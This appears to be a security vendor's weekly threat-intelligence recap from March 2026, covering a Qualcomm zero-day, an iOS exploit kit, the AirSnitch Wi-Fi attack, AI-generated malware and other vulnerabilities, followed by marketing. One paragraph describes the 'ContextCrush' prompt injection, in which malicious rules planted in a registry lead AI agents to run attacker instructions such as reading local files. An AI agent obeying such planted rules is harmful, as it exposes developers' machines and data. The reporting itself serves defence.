Weekly Recap: Qualcomm 0-Day, iOS Exploit Chains, AirSnitch Attack & Vibe-Coded Malware – CVE-2026-21385 (CVSS 7.8)

Estimated Reading Time: 6 minutes

Key Takeaways:

  • Discovery and targeted exploitation of CVE-2026-21385, a high-severity buffer over-read in Qualcomm graphics drivers.
  • Identification of the Coruna iOS exploit kit lifecycle, highlighting a thriving secondary market for zero-day exploits between state actors and cybercriminals.
  • The AirSnitch attack methodology proves that standard Wi-Fi client isolation is architecturally insufficient to prevent AitM attacks.
  • Threat actors like Transparent Tribe are industrializing malware production through AI-assisted “vibe-coding” in niche programming languages.
  • Critical infrastructure risks identified in Kubernetes RBAC and popular WordPress plugins allow for unauthorized cluster and site administrative access.

Table of Contents

Technical analysis of recent threat intelligence indicates a surge in highly targeted mobile exploits, the industrialization of AI-assisted malware development, and significant bypasses in standard Wi-Fi isolation protocols. This weekly recap details the critical vulnerabilities and actor behaviors identified in early March 2026. Data confirms that enterprise technologies now account for nearly 50% of zero-day exploitations, emphasizing the need for a comprehensive cyber threat intelligence platform to track rapid shifts in the threat landscape.

The reporting period has been characterized by the disclosure of a high-severity flaw in Qualcomm hardware, a sophisticated “secondhand” market for iOS exploit kits, and the evolution of Pakistani-aligned threat actors using AI-generated code. Additionally, new research into Wi-Fi client isolation has revealed architectural weaknesses that allow for adversary-in-the-middle (AitM) attacks even in protected environments.

Qualcomm Graphics Component Vulnerability: CVE-2026-21385 (CVSS 7.8)

A critical security flaw in Qualcomm chips, used extensively across the Android ecosystem, is currently undergoing limited, targeted exploitation. Identified as CVE-2026-21385, this vulnerability resides in the Graphics component and is classified as a buffer over-read.

Graphic showing CVE-2026-21385 vulnerability in Qualcomm graphics driver

The technical impact of a buffer over-read in a high-privilege component like the graphics driver includes memory corruption and potential arbitrary code execution. While Google’s Android security bulletin confirms evidence of exploitation, specific technical details regarding the exploit strings or the identities of the targeted groups remain restricted. This vulnerability illustrates the continued focus of threat actors on hardware-level entry points to bypass operating system security controls.

The Coruna iOS Exploit Kit and the Secondary Market for Zero-Days

Google’s Threat Analysis Group recently disclosed the lifecycle of the “Coruna” (also known as CryptoWaters) exploit kit. This kit is notable not just for its technical depth-comprising 23 exploits and five full iOS exploit chains-but for its transition between disparate threat actors.

Coruna targets iOS versions 13.0 through 17.2.1. Its history suggests a complex supply chain:

  • February 2025: Developed or initially deployed by a commercial surveillance vendor (CSV).
  • July 2025: Utilized by a suspected Russian espionage group targeting Ukrainian entities.
  • Late 2025: Repurposed by financially motivated Chinese cybercrime groups targeting cryptocurrency wallets.

“The movement of this kit between state-sponsored actors and cybercriminals suggests a secondhand market where exploits are resold or leaked after their primary mission is completed.”

This emphasizes the necessity for underground forum intelligence to track the migration of high-tier exploit code into the broader criminal ecosystem.

AirSnitch: Bypassing Wi-Fi Client Isolation

Research led by Xin’an Zhou has introduced “AirSnitch,” an attack that invalidates the encryption and isolation layers used to separate clients on the same Wi-Fi network. Client isolation is a standard security feature in public and corporate guest networks intended to prevent peer-to-peer attacks.

AirSnitch leverages three primary architectural weaknesses:

  1. Group Key Abuse: Exploiting the shared group keys distributed to all clients for broadcast traffic.
  2. IP Layer Forwarding: Tricking the gateway into forwarding packets at the IP layer, bypassing isolation that is only enforced at the MAC or Ethernet layers.
  3. Bridge Manipulation: Manipulating internal switches to forward victim uplink and downlink traffic directly to the adversary.

This research demonstrates that client isolation is insufficient to prevent AitM capabilities for an attacker already connected to the network.

Vibe-Coded Malware and AI Industrialization

The Pakistan-aligned threat actor Transparent Tribe (APT36) has shifted its development strategy toward AI-assisted malware industrialization. Bitdefender reports the use of “vibe-coding” to generate disposable malware in niche programming languages including Nim, Zig, and Crystal.

By using these languages, the actor creates “polyglot” binaries that frequently evade traditional signature-based breach detection systems. The focus is no longer on high technical sophistication but on flooding environments with unique, AI-generated variants that target Indian government entities and foreign embassies. This represents a move toward high-volume, automated malware production.

Analysis of ransomware activity through 2025 shows a divergence between attack volume and total revenue. While the number of attacks increased by 50%, total on-chain payments stagnated at approximately $820 million. However, the median ransom payment increased by 368%, reaching nearly $60,000.

Key shifts in ransomware tactics include:

  • AzCopy for Exfiltration: Actors are increasingly using Microsoft’s AzCopy utility rather than Rclone. Using a legitimate Azure tool allows attackers to blend in with authorized cloud traffic.
  • Phobos Infrastructure: The guilty plea of Evgenii Ptitsyn confirms the scale of the Phobos ransomware-as-a-service (RaaS) model, which extorted over $39 million from 1,000 victims.
  • Payment Rates: The rate of victims paying ransoms dropped from 63% in 2024 to 29% in 2025, suggesting improved recovery capabilities and a shift toward data-theft-only extortion.

For organizations managing large data volumes, utilizing a live ransomware API can provide the telemetry needed to identify these exfiltration patterns in real-time.

Anthropic and Firefox: AI-Driven Vulnerability Discovery

In a partnership with Mozilla, Anthropic utilized the Claude Opus 4.6 model to identify 22 security vulnerabilities in Firefox. The audit identified 14 high-severity, seven moderate, and one low-severity flaw. These issues were patched in Firefox 148.

The findings indicate that LLMs are currently more efficient at identifying vulnerabilities than at constructing functional exploits. The cost-effectiveness of AI-driven auditing suggests that both defenders and attackers will increasingly use similar models to scan large codebases for memory safety issues and logic flaws.

Critical Vulnerabilities in Infrastructure and Plugins

Kubernetes RBAC Bypass: A bug in the Kubernetes API server’s handling of WebSocket connections allows for an authorization bypass. Service accounts with nodes/proxy GET permissions can execute commands in any Pod in the cluster, potentially leading to full cluster compromise.

WPEverest User Registration (CVE-2026-1492): A flaw in this WordPress plugin (CVSS 9.8) allows unauthenticated attackers to create administrator accounts by failing to enforce a server-side allowlist for user-supplied roles.

Context7 “ContextCrush” Attack: Noma Security identified a vulnerability where attackers can plant malicious “Custom Rules” in the Context7 registry. AI agents trust this channel and may execute attacker instructions, such as reading local files, directly on a developer’s machine.

MuddyWater Operations Analysis

Analysis of a VPS linked to the Iranian group MuddyWater (Mercury) reveals an extensive reconnaissance infrastructure. The actor utilizes tools like Shodan, Nuclei, and subfinder to identify targets. Their custom command-and-control framework, KeyC2, uses a custom binary protocol on port 1269. Other identified tools include PersianC2 and ArenaC2. The group shows a clear preference for exploiting networking appliances from BeyondTrust, Ivanti, and Fortinet.

Practical Takeaways for Technical and Business Leaders

Technical Action Items:

  • Audit Kubernetes RBAC: Review service accounts for nodes/proxy GET permissions and restrict them immediately.
  • Update Mobile Assets: Ensure all Android/Qualcomm devices are updated to mitigate CVE-2026-21385.
  • Review Wi-Fi Architecture: Implement 802.1X with per-user VLANs rather than relying on client isolation for layer-2 separation.
  • Update WordPress Plugins: Immediately update WPEverest User Registration to version 5.1.3 or later.

Business Strategy:

  • Monitor AI Integration: Audit “Shadow AI” instances where developers might connect AI assistants to untrusted registries.
  • Enhance Exfiltration Monitoring: Implement baseline behavioral monitoring for Azure storage accounts to detect stealthy use of tools like AzCopy.

PurpleOps Expertise and Services

The complexities of the Coruna exploit kit and the industrialization of vibe-coded malware highlight the necessity of professional security testing and intelligence. PurpleOps provides specialized services to address these high-level threats.

Our Cyber Threat Intelligence service integrates dark web monitoring and telegram threat monitoring to identify when proprietary exploits are being traded. By leveraging underground forum intelligence, we provide early warnings of exploit migration.

To address risks from hardware flaws and specialized malware, PurpleOps offers Penetration Testing and Red Team Operations. These services simulate tactics used by actors like MuddyWater and Transparent Tribe.

Organizations can utilize our Supply Chain Information Security and Supply Chain Risk Monitoring services to identify vulnerabilities in third-party components before they are exploited.

For real-time ransomware protection, our Protect Ransomware solutions use **real-time ransomware intelligence** to detect and block data exfiltration attempts.

Contact PurpleOps today to strengthen your security posture:

Frequently Asked Questions

What is CVE-2026-21385 and why is it dangerous?
It is a high-severity buffer over-read in Qualcomm’s graphics component. It is dangerous because it allows for potential arbitrary code execution at a hardware level, bypassing many standard Android security controls.

How does the AirSnitch attack bypass Wi-Fi security?
AirSnitch exploits architectural flaws in how Wi-Fi gateways handle group keys and IP layer forwarding, allowing an attacker to intercept traffic from other clients even when “client isolation” is enabled.

What is “vibe-coding” in the context of malware?
Vibe-coding refers to the use of AI to rapidly generate disposable malware variants in niche programming languages. This allows threat actors to flood targets with unique binaries that are difficult for signature-based detection systems to identify.

Why are ransomware payment rates dropping if attack volumes are up?
Improved organizational recovery capabilities and a strategic shift by many companies to refuse payment for data-theft-only extortion have contributed to the decline in payment rates.